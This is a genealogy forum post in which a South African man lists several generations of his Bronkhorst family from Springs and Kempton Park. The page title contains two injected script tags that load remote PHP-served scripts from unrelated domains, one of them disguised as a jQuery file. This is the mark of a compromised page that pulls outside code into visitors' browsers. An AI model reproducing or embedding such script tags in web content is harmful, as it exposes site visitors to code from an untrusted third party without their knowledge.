Looking for the Bronkhorst family from Springs RSA<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for the Bronkhorst family from Springs RSA

Hi my name is John Pitman Bronkhorst. My father was Salmon Willem Bronkhorst. He worked on the railway as a shanter an in 1962 lost his legs in a work acsident. We moved to Springs where my grand father, Johanes Cornelius Peterus Bronkhorst lived with my grand mother, Gretruida Jacoba Bronkhorst (Groenewald). They had one son Salmon Willem and two dorghters, Betty (Bason) and Baba ( Ys). Baba had n son Danie that was adopted by my grand pearents.
My mother was Christien Bronkhorst (Blake). I had an older sister, Christina Susana Magrieta Potgieter (Bronkhorst also Fourie). She had a doghter Christien van Vuuren (Bronkhorst). Her son Herman Potgieter still live in Springs with his wive and father.
My older brother, Johanes Cornelius Peterus Bronkhorst and his wife Heter Bronkhorst (Adams) had a son Pieter Bronkhorst and n dorghter Chantel Bronkhorst. Hanes and Heter got seperated and Heter got maryed again. We do not know of there whearabouts now.
My self , JP Bronkhorst and my wife Selma Bronkhorst (Heskes) live in Kempton Park. We got two sons, Martin and Wynand Bronkhorst. They are both maryed.
My younger suster,Gertruida Jacoba Smit (Bronkhorst) and her hasband Kobus Smit had two sons Willem and Alwyn.
My yougest sister Ronika Chamier (Bronkhorst) had three children, Jesica, Ronald and Jefry Chamier.

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on 2014-10-23 03:27:18

johnpitmanbronkhorst has been a Family Tree Circles member since Aug 2014.

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